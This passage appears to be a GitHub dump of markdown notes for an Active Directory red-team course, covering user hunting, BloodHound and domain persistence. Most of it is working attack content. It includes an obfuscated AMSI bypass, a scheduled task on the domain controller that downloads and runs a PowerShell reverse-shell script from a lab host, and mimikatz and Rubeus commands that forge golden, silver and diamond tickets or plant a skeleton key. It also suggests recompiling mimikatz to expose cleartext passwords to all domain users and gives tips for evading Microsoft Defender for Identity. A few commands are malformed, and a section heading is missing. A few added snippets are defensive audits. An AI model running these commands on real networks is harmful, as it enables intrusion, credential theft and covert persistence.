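                TrustType            = $_.TrustType
                SidFilterQuarantined = $_.SIDFilteringQuarantined  # SID filtering state on the trust
            }
        }
    }
}

# Usage: full map of the current forest, one row per (source domain, trust)
Get-ForestTrustMap | Sort-Object Source, Target | Format-Table -AutoSize
```

`Direction` is read from the perspective of the queried `Source` domain: `Outbound` means that domain trusts the target, so the target's users can reach its resources. Rows with `IntraForest = False` are the external or forest trusts worth reviewing, and a `SidFilterQuarantined = False` on such a trust means SIDs from outside the trusted domain (SID history included) are not being discarded at the boundary.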
## **Solutions**

**_Coming Soon_**

> **Note :** Up to this point we have only been querying the domain controller for information; no other machine has been contacted.

# **Domain Enumeration Cont'd - User Hunting**

Note that this enumeration is much noisier than anything we have done so far, because it touches every machine in the domain rather than just the DC.

- Find all machines on the current domain where the current user has local admin access

```powershell
# powerview
$ Find-LocalAdminAccess -Verbose
```

> **Note :** This function queries the DC of the current or provided domain for a list of computers (`Get-NetComputer`) and then runs the multi-threaded `Invoke-CheckLocalAdminAccess` against each machine (it opens the Service Control Manager on each host, which only succeeds for local administrators, and generates a logon event on every target).

**_How It Works -:_**

![](https://i.imgur.com/QdFG3nS.png)

The same check can be done with remote administration protocols such as **WMI** and **PowerShell remoting**. This is useful where the RPC/SMB ports that `Find-LocalAdminAccess` relies on are blocked but WMI (DCOM) or WinRM is allowed; the course tools ship the `Find-WMILocalAdminAccess.ps1` script for this. Be careful while running these, since every attempt is logged on the target.
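As an added example (not code from the course notes or from the `Find-WMILocalAdminAccess.ps1` script it mentions), the following function performs the WMI variant of the local-admin check: it asks every enabled computer object for `Win32_OperatingSystem` over DCOM and classifies the result as admin, access denied, or unreachable. It assumes the ActiveDirectory module is loaded and that the current logon token is the one being tested; the hostnames come from the domain, nothing is hard-coded.

```powershell
# Added example: test local admin access over WMI/DCOM instead of SMB/RPC.
# Assumes the ActiveDirectory module and network line-of-sight to the hosts.
Import-Module ActiveDirectory

function Test-WmiLocalAdminAccess {
    [CmdletBinding()]
    param(
        # Hosts to test; defaults to every enabled computer object in the current domain
        [string[]]$ComputerName = (Get-ADComputer -Filter 'Enabled -eq $true').DNSHostName
    )
    foreach ($target in $ComputerName) {
        $result = [pscustomobject]@{ ComputerName = $target; Admin = $false; Status = '' }
        try {
            # The default root\cimv2 DACL grants "Remote Enable" only to local Administrators,
            # so a successful remote query implies admin access on the target.
            $null = Get-WmiObject -Class Win32_OperatingSystem -ComputerName $target -ErrorAction Stop
            $result.Admin  = $true
            $result.Status = 'Admin'
        } catch [System.UnauthorizedAccessException] {
            $result.Status = 'Access denied'           # reachable, but we are not an admin there
        } catch [System.Runtime.InteropServices.COMException] {
            # 0x800706BA = RPC server unavailable (host down, firewall, or DCOM blocked)
            $result.Status = ('Unreachable (0x{0:X8})' -f $_.Exception.ErrorCode)
        } catch {
            $result.Status = $_.Exception.Message
        }
        Write-Verbose "$target : $($result.Status)"
        $result
    }
}

# Usage: list only the hosts where the current user is a local administrator
Test-WmiLocalAdminAccess -Verbose | Where-Object Admin
```

Each probe is a DCOM activation on the target, so this is as visible in the target's Security log (logon event per attempt) as the SMB-based check; it simply uses a different port.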
- Find local admins on all machines of the domain (needs administrator privileges on non-DC machines)

```powershell
# powerview
$ Invoke-EnumerateLocalAdmin -Verbose
```

> **Note :** One of the easiest ways of escalating to domain admin is to look for a machine where a domain admin token, credential or session is available and where we already have local admin privileges.

- Find computers where a domain admin (or the specified user/group) has sessions

```powershell
# powerview
$ Invoke-UserHunter
$ Invoke-UserHunter -GroupName "RDPUsers"
```

- Also confirm that we have admin access on the machines where those sessions were found

```powershell
# powerview
$ Invoke-UserHunter -CheckAccess
```

- Find computers where a domain admin is logged in, querying only high-value servers (DCs and file servers) rather than every host

```powershell
# powerview
$ Invoke-UserHunter -Stealth
```

**_How it works :_**

![](https://i.imgur.com/iXK89et.png)

# **Defense**

![](https://i.imgur.com/4gqi52B.png)

**Make sure to test this out first and see if the organization is okay with it before implementing**

-- DONE --

--------------------------------------------------------------------------------
/Domain Enumeration - Part 5.md:
--------------------------------------------------------------------------------
# **Domain Enumeration Cont'd - BloodHound**

- Commonly used by penetration testers and red teamers.
- Provides a GUI for AD entities and relationships for the data collected by its ingestors.
- Uses graph theory to map the shortest path to interesting targets like Domain Admins.
- BloodHound generates a lot of detections if used carelessly.
- Supports custom Cypher queries.
https://github.com/BloodHoundAD/BloodHound

## **Usage**

- The SharpHound PowerShell collector is flagged by AMSI, so first patch `AmsiScanBuffer` in the current PowerShell process by pasting the code below. The strings are HTML-entity encoded so that the script itself never contains the literal `amsi.dll` / `AmsiScanBuffer`; the six patched bytes are `mov eax, 0x80070057` (E_INVALIDARG) followed by `ret`, so every scan returns an error and the content is treated as clean.

```powershell
$ZQCUW = @"
using System;
using System.Runtime.InteropServices;
public class ZQCUW {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $ZQCUW
# 'amsi.dll' and 'AmsiScanBuffer', HTML-entity encoded and decoded at run time
$BBWHVWQ = [ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97;&#109;&#115;&#105;&#46;&#100;&#108;&#108;'))")
$XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, "$([systeM.neT.webUtility]::HtMldECoDE('&#65;&#109;&#115;&#105;&#83;&#99;&#97;&#110;&#66;&#117;&#102;&#102;&#101;&#114;'))")
# make the first 6 bytes of AmsiScanBuffer writable (0x40 = PAGE_EXECUTE_READWRITE)
$p = 0
[ZQCUW]::VirtualProtect($XPYMWR, [uint32]6, 0x40, [ref]$p)
# B8 57 00 07 80   mov eax, 0x80070057 (E_INVALIDARG)
# C3               ret
$TLML = "0xB8"
$PURX = "0x57"
$YNWL = "0x00"
$RTGX = "0x07"
$XVON = "0x80"
$WRUD = "0xC3"
$KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,$XVON,$WRUD)
[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)
```

- Load the SharpHound collector (remember to bypass AMSI first 🙄)

```powershell
. .\SharpHound.ps1
```

- Run the collector to gather data

```powershell
$ Invoke-BloodHound -CollectionMethod All

# OR

$ SharpHound.exe
```

- Start the BloodHound GUI; make sure **neo4j** is running first (refer to the lab manual 📚 for more info)

- The collectors live in the `.\BloodHound-master\collectors` directory of the BloodHound release. The collector writes a zip archive, which can be uploaded to the BloodHound GUI as-is (no need to unzip; drag and drop also works)

- To make BloodHound collection stealthier, use the `-Stealth` option
(removes the noisy collection methods RDP, DCOM, PSRemote and LocalAdmin).

```powershell
$ Invoke-BloodHound -Stealth

# OR

$ SharpHound.exe --stealth
```

- To avoid detections by MDI, whose sensors run on the domain controllers, exclude the DCs from collection

```powershell
$ Invoke-BloodHound -ExcludeDCs
```

> **Note :** We do not ignore **Microsoft Defender for Identity** (MDI): its detections are specific to Active Directory attacks, so we evade it as much as possible. **Microsoft Defender for Endpoint** (MDE) is not our concern in this course.

# **Learning Objective 6**

- Set up BloodHound and identify the shortest path to Domain Admins in the dollarcorp domain.

## **Solution**

**_Coming Soon_**

**To download a guide to follow, you can use this [book](https://ernw.de/download/BloodHoundWorkshop/ERNW_DogWhispererHandbook.pdf) :**

> **Note :** For the CRTP exam, do not try to set up BloodHound on the foothold as it will waste **time**; set up the BloodHound **GUI** on your host system beforehand and only transfer the collector to the foothold machine.
> Also, the older (legacy) version of BloodHound may be the better choice because its collector enumerates local admin rights, so try that one too.

--------------------------------------------------------------------------------
/Domain Persistence.md:
--------------------------------------------------------------------------------
> **Note -:** You need domain admin privileges to set up persistence; using the persistence afterwards does not require domain admin privileges (although you might sometimes need them to read or write files).

# **Domain Persistence**

- There is much more to Active Directory than "just" Domain Admin.
- Once we have DA privileges, new avenues of persistence, escalation to EA and attacks across trusts open up!

# **Kerberos**

- `Kerberos` is the basis of authentication in a Windows Active Directory environment.
- Clients (programs on behalf of a user) need to obtain tickets from the Key Distribution Center (`KDC`), which is a service running on the domain controller.
- These tickets represent the client's credentials. Therefore, `Kerberos` is understandably a very interesting target of abuse!

![](https://i.imgur.com/lpHU58k.png)

# **Golden Ticket**

- A golden ticket is signed and encrypted by the hash of the krbtgt account, which makes it a valid TGT.
- The krbtgt hash can be used to impersonate any user with any privileges, even from a non-domain machine.
- As a good practice, it is recommended to change the password of the krbtgt account twice, as password history is maintained for the account (after a single change the previous key still validates tickets).

![](https://i.imgur.com/f4Ti5Jm.png)

| Options | |
|:-----|:-----|
| kerberos::golden | Name of the module |
| /User:Administrator | Username for which the TGT is generated |
| /domain:dollarcorp.moneycorp.local | Domain FQDN |
| /sid:S-1-5-21-719815819-3726368948-3917688648 | SID of the domain |
| /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 | AES256 key of the krbtgt account. Using AES keys makes the attack more silent (no RC4 encryption-downgrade event). |
| /id:500 /groups:512 | Optional user RID (default 500) and groups (default 513 512 520 518 519) |
| /ptt | Injects the ticket in the current PowerShell process - no need to save the ticket on disk |
| OR | |
| /ticket | Saves the ticket to a file for later use |
| /startoffset:0 | Optional: when the ticket becomes valid, in minutes (default 0 - right now). Use a negative value for a ticket valid from the past and a larger number for a future start. |
| /endin:600 | Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes |
| /renewmax:10080 | Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 10080 minutes |

**_Example Command_ -:**

- Run the below command to create a Golden ticket on any machine that has network connectivity with the DC (see the table above for what each option does). Matching `/endin` and `/renewmax` to the domain's Kerberos policy avoids the 10-year lifetimes that mimikatz uses by default and that stand out in ticket requests:

```powershell
$ C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
```

# **Learning Objective 8**

- Extract secrets from the domain controller of dollarcorp.
- Using the secrets of the `krbtgt` account, create a golden ticket.
- Use the Golden ticket to (once again) get domain admin privileges from a machine.

## **Solution**

**_Coming Soon_**

# **Silver Ticket**

- A valid `TGS` (a Golden ticket is a `TGT`).
- Encrypted and signed by the hash of the service account (a Golden ticket is signed by the hash of krbtgt) of the service running with that account.
- Services rarely check the `PAC` (Privilege Attribute Certificate).
- Services will allow access only to the services themselves.
- Reasonable persistence period (computer account passwords rotate every 30 days by default).

![](https://i.imgur.com/FIuN49E.png)

| Options | |
|:-----|:-----|
| kerberos::golden | Name of the module (there is no silver module!) |
| /User:Administrator | Username for which the service ticket (TGS) is generated |
| /domain:dollarcorp.moneycorp.local | Domain FQDN |
| /sid:S-1-5-21-719815819-3726368948-3917688648 | SID of the domain |
| /target:dcorp-dc.dollarcorp.moneycorp.local | Target server FQDN |
| /service:cifs | The SPN service class for which the TGS is to be created |
| /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 | AES256 key of the service account (for a DC service, the DC's machine account), not of krbtgt. Using AES keys makes the attack more silent. |
| /id:500 /groups:512 | Optional user RID (default 500) and groups (default 513 512 520 518 519) |
| /ptt | Injects the ticket in the current PowerShell process - no need to save the ticket on disk |
| /startoffset:0 | Optional: when the ticket becomes valid, in minutes (default 0 - right now). Use a negative value for a ticket valid from the past and a larger number for a future start. |
| /endin:600 | Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes |
| /renewmax:10080 | Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 10080 minutes |

**_Example Usage -:_**

- Using the NTLM `hash` of the Domain Controller computer account, the below command provides access to the file system on the DC

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:e9bb4c3d1327e29093dfecab8c2676f6 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

# A similar command can be used for any other service on a machine. Which services? HOST, RPCSS, HTTP and many more
```

- There are also various ways of achieving command execution using Silver tickets.
- Create a silver ticket for the **HOST SPN**, which will allow us to schedule a task on the target:

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:e9bb4c3d1327e29093dfecab8c2676f6 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
```

Schedule and execute a task - noisy but fine for PoC :)

```powershell
$ schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.1:8080/Invoke-PowerShellTcp.ps1''')'"

# the task only fires on its weekly trigger, so start it right away
$ schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"
```

# **Learning Objective 9**

- [ ] During the additional lab time:
    - Try to get command execution on the domain controller by creating silver tickets for:
        - HOST service
        - WMI

## **Solution**

**_Coming Soon_**

> In the case of a Golden ticket we forge a `TGT`; in the case of a Silver ticket we forge a Service ticket or `TGS`.

# **Diamond Ticket**

- A diamond ticket is created by decrypting a valid `TGT`, making changes to it and re-encrypting it using the `AES` keys of the krbtgt account.
- A Golden ticket is a `TGT` forging attack, whereas a diamond ticket is a `TGT` modification attack.
- Once again, the persistence lifetime depends on the krbtgt account.
- A diamond ticket is more opsec safe because:
    - It has valid ticket times, since a `TGT` actually issued by the DC is modified.
    - With a golden ticket there is no corresponding `TGT` request (AS-REQ) logged on the DC for the later TGS/service ticket requests, as the `TGT` is forged.
- A diamond ticket should be chosen over a golden ticket in a real assessment.
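The opsec point above (valid ticket times versus mimikatz's 10-year defaults) can be checked on any host with `klist`. As an added example, not part of the course notes, the function below parses `klist` output and flags cached tickets whose lifetime or renewal window exceeds the Kerberos policy. The policy values are the AD defaults (10 hours, 7 days) assumed here rather than read from the domain, and the sample `klist` text at the bottom is constructed: ticket `#0` imitates a golden ticket created with default lifetimes, ticket `#1` a normal TGT.

```powershell
# Added example: flag cached Kerberos tickets whose lifetimes do not match the domain policy
# (the tell a forged ticket with mimikatz default lifetimes leaves; /endin:600 /renewmax:10080
# or a diamond ticket avoid it). Policy values below are assumed AD defaults.
function ConvertTo-KlistTime([string]$Block, [string]$Label) {
    # klist prints e.g. "Start Time: 1/10/2024 9:00:00 (local)"; parse culture-independently
    $m = [regex]::Match($Block, "$Label\s*([\d/]+ [\d:]+)")
    [datetime]::ParseExact($m.Groups[1].Value, 'M/d/yyyy H:mm:ss', [cultureinfo]::InvariantCulture)
}

function Get-SuspiciousKerberosTicket {
    param(
        [string]$KlistOutput = (klist | Out-String),
        [int]$MaxTicketAgeHours = 10,   # AD default "Maximum lifetime for user ticket"
        [int]$MaxRenewAgeDays   = 7     # AD default "Maximum lifetime for user ticket renewal"
    )
    # one block per ticket, each starting with "#<n>>"
    $blocks = $KlistOutput -split '(?m)^#\d+>' | Where-Object { $_ -match 'Server:' }
    foreach ($b in $blocks) {
        $start = ConvertTo-KlistTime $b 'Start Time:'
        $end   = ConvertTo-KlistTime $b 'End Time:'
        $renew = ConvertTo-KlistTime $b 'Renew Time:'
        $lifeHours = [math]::Floor(($end - $start).TotalHours)
        $renewDays = [math]::Floor(($renew - $start).TotalDays)
        $reasons = @()
        if ($lifeHours -gt $MaxTicketAgeHours) { $reasons += "lifetime ${lifeHours}h > policy ${MaxTicketAgeHours}h" }
        if ($renewDays -gt $MaxRenewAgeDays)   { $reasons += "renew window ${renewDays}d > policy ${MaxRenewAgeDays}d" }
        [pscustomobject]@{
            Client     = [regex]::Match($b, 'Client:\s*(\S+)').Groups[1].Value
            Server     = [regex]::Match($b, 'Server:\s*(\S+)').Groups[1].Value
            Start      = $start
            End        = $end
            Suspicious = ($reasons.Count -gt 0)
            Reason     = ($reasons -join '; ')
        }
    }
}

# Constructed sample klist output: #0 = forged TGT with 10-year lifetimes, #1 = normal TGT
$sample = @'
#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        Start Time: 1/10/2024 9:00:00 (local)
        End Time:   1/8/2034 9:00:00 (local)
        Renew Time: 1/8/2034 9:00:00 (local)
#1>     Client: student1 @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        Start Time: 1/10/2024 9:00:00 (local)
        End Time:   1/10/2024 19:00:00 (local)
        Renew Time: 1/17/2024 9:00:00 (local)
'@
Get-SuspiciousKerberosTicket -KlistOutput $sample | Format-Table -AutoSize
# Run without -KlistOutput to check the tickets of the current logon session instead.
```

Only ticket `#0` is reported, for both its lifetime and its renewal window; a golden ticket created with `/endin:600 /renewmax:10080` passes this check, which is exactly why the example command uses those values.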
> In **Golden tickets** we forge a `TGT`; in a **Diamond ticket** we open it up (decrypt), make changes and re-encrypt it.

**_Example Usage -:_**

- We still need the `krbtgt AES keys`. Use the following `Rubeus` command to create a diamond ticket (note that the `RC4` or `AES` keys of the user can be used in place of its password):

```powershell
Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /user:studentx /password:StudentxPassword /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

- We can also use the `/tgtdeleg` option in place of credentials, which extracts a usable TGT for the current logon session, in case we already have access as a domain user:

```powershell
Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

# **Learning Objective 10**

- Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack.

## **Solution**

**_Coming Soon_**

# **Skeleton Key**

- Skeleton Key is a persistence technique where the lsass process of a Domain Controller is patched so that it accepts a single master password for any user (the users' real passwords keep working as well).
- The technique was discovered by Dell SecureWorks, who found it used by malware they named Skeleton Key.
- All the publicly known methods are NOT persistent across reboots. Yet again, mimikatz to the rescue.
**_Example Usage -:_**

- Use the below command to inject a skeleton key (the master password will be "mimikatz") on a Domain Controller of choice. DA privileges are required.

```powershell
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
```

- Now it is possible to access any machine with a valid username and the password "mimikatz"

```powershell
Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator
```

> Note that Skeleton Key is not opsec safe and is also known to cause issues with AD CS.

- In case lsass is running as a protected process (RunAsPPL), we can still use Skeleton Key, but it needs the mimikatz driver (mimidrv.sys) on the disk of the target

- DC:

```
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
```

- Note that the above would be very noisy in logs - service installation (kernel mode driver)

# **DSRM**

- DSRM is Directory Services Restore Mode.
- There is a local administrator on every DC called "Administrator" whose password is the DSRM password.
- The DSRM password (SafeModePassword) is required when a server is promoted to Domain Controller and it is rarely changed.
- After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC.
![](https://i.imgur.com/05CvCxs.png)

**_Example Usage -:_**

- Dump the DSRM password hash from the DC's local SAM (needs DA privs)

```powershell
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc
```

- Compare the Administrator hash with the domain Administrator hash from the below command

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
```

- The first one is the DSRM local Administrator.

---

- Since it is the local administrator of the DC, we can also pass the hash to authenticate.
- But the logon behavior for the DSRM account needs to be changed before we can use its hash over the network (value 2 allows the DSRM administrator to log on even while the DC is running normally).

```powershell
Enter-PSSession -Computername dcorp-dc
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
```

- Then use the below command to pass the hash (note `/domain:dcorp-dc`: this is a local account of the DC, not a domain account)

```powershell
$ Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

$ ls \\dcorp-dc\C$
```

# **Learning Objective 11**

- During additional lab time:
    - Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.

## **Solution**

**_Coming Soon_**

# **Custom SSP**

- A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Some SSP packages by Microsoft are:
    - NTLM
    - Kerberos
    - Wdigest
    - CredSSP

- Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.
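The registry-based way of planting an SSP (adding a name to `Security Packages`) is also the easiest thing to audit. As an added example, not code from the course notes, the function below reads both `Security Packages` values on a host, compares each entry against the package names Windows registers itself, and reports the Authenticode status of the DLL in `System32`. It assumes admin rights on the target (needed for the remote registry and `admin$`); the list of known packages is the author's own, taken from default Windows installs, and catalog-signed OS DLLs may report `NotSigned` on older PowerShell versions, so the name check is what drives the `Suspicious` flag.

```powershell
# Added example: audit the SSP registrations that the registry method above modifies.
# Assumes admin rights on the target and the Remote Registry service reachable.
function Get-SecurityPackageAudit {
    param([string]$ComputerName = $env:COMPUTERNAME)
    $keys = @(
        'SYSTEM\CurrentControlSet\Control\Lsa',
        'SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
    )
    # Packages present on a default install (assumed list); anything else deserves a look
    $known = 'kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap'
    $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $ComputerName)
    foreach ($k in $keys) {
        $sub = $reg.OpenSubKey($k)
        if (-not $sub) { continue }
        foreach ($pkg in @($sub.GetValue('Security Packages'))) {   # REG_MULTI_SZ -> string[]
            $name = ([string]$pkg).Trim('"')
            if (-not $name) { continue }                            # default value is an empty entry
            $dll  = "\\$ComputerName\admin$\System32\$name.dll"
            $sig  = if (Test-Path $dll) { (Get-AuthenticodeSignature $dll).Status } else { 'dll missing' }
            [pscustomobject]@{
                Key          = "HKLM\$k"
                Package      = $name
                KnownPackage = ($known -contains $name.ToLower())
                DllSignature = $sig
                Suspicious   = ($known -notcontains $name.ToLower())
            }
        }
    }
}

# Usage: list registrations on the DC; a "mimilib" entry with an unsigned DLL is the backdoor above
Get-SecurityPackageAudit -ComputerName dcorp-dc | Format-Table -AutoSize
```

The in-memory `misc::memssp` variant leaves no registry trace and is only visible in LSASS memory or through the `mimilsa.log` file it writes, so this audit covers the persistent variant only.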
**_Examples -:_**

- [ ] We can use either of the following ways:

- Drop mimilib.dll into System32 and add mimilib to the `Security Packages` value under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` (and its `OSConfig` subkey); LSASS loads the new package at the next reboot:

```powershell
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages
```

- Using mimikatz, inject into lsass (not super stable with Server 2019 and Server 2022 but still usable):

```powershell
Invoke-Mimikatz -Command '"misc::memssp"'
```

All local logons on the DC are now logged to `C:\Windows\system32\mimilsa.log`

![](https://i.imgur.com/87AenfB.png)

> **Note -:** As said in the beginning, you will need domain admin privileges to read the logged passwords, because the log sits under `system32` on the DC. That can be avoided by having the log written under `SYSVOL` (`C:\Windows\SYSVOL`, shared as `\\dc\SYSVOL`) instead: SYSVOL holds the domain's public files (logon scripts and policies) that every client must read, so it is readable by all authenticated users and replicated between DCs. It is not writable by ordinary users, but LSASS on the DC writes the log as SYSTEM, so recompiling mimikatz with this module's output path changed to a file in `SYSVOL` gives any domain user the cleartext passwords.
- Resides in the System container of a domain and is used to control the permissions - using an ACL - for certain built-in privileged groups (called Protected Groups) and their members.

- The Security Descriptor Propagator (SDPROP) runs every hour, compares the ACL of protected groups and their members with the ACL of AdminSDHolder, and overwrites any differences on the object ACL (it also disables inheritance on those objects).

- Protected Groups

| | |
|:-----|:-----|
| Account Operators | Enterprise Admins |
| Backup Operators | Domain Controllers |
| Server Operators | Read-only Domain Controllers |
| Print Operators | Schema Admins |
| Domain Admins | Administrators |
| Replicator | |

- Well-known abuse of some of the Protected Groups - all of the below can log on locally to a DC

| | |
|:-----|:-----|
| Account Operators | Cannot modify DA/EA/BA groups. Can modify nested groups within these groups. |
| Backup Operators | Back up a GPO, edit it to add the SID of a controlled account to a privileged group and restore it. |
| Server Operators | Run a command as SYSTEM (using the disabled Browser service). |
| Print Operators | Copy an ntds.dit backup, load device drivers. |

- With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object.
411 | 412 | 413 | **_Example -:_** 414 | 415 | 416 | 417 | - Add FullControl permissions for a user to the AdminSDHolder using `PowerView` as DA: 418 | 419 | 420 | ```powershell 421 | # Powerview 422 | 423 | Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 - Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose 424 | ``` 425 | 426 | 427 | 428 | - Using ActiveDirectory Module and RACE toolkit (https://github.com/samratashok/RACE) : 429 | 430 | 431 | 432 | 433 | ```powershell 434 | 435 | Set-DCPermissions -Method AdminSDHolder -SAMAccountName student1 - 436 | Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Verbose 437 | ``` 438 | 439 | 440 | 441 | - Other interesting permissions (ResetPassword, WriteMembers) for a user to the AdminSDHolder,: 442 | 443 | ```powershell 444 | Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose 445 | ``` 446 | 447 | 448 | 449 | ```powershell 450 | Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights WriteMembers -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose 451 | ``` 452 | 453 | 454 | - Run SDProp manually using Invoke-SDPropagator.ps1 from Tools directory to make any of the above command take effect: 455 | 456 | 457 | 458 | ```powershell 459 | Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose 460 | ``` 461 | 462 | 463 | - For pre-Server 2008 machines: 464 | 465 | 466 | ```powershell 467 | Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose 468 | ``` 469 | 470 | 471 | 472 | **_More Examples 
- Check the **Domain Admins permissions** with `PowerView` as a normal user:

```powershell
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student1"}
```

- Using the `ActiveDirectory Module`:

```powershell
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'}
```

- Abusing **Full Control** using `PowerView`:

```powershell
Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
```

- Using the `ActiveDirectory Module`:

```powershell
Add-ADGroupMember -Identity 'Domain Admins' -Members testda
```

- Abusing **ResetPassword** using `PowerView`:

```powershell
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
```

- Using the `ActiveDirectory Module`:

```powershell
Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
```

- Add **Full Control** rights on the domain object, `PowerView`:

```powershell
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
```

- Using the `ActiveDirectory Module` and `RACE`:

```powershell
Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose
```
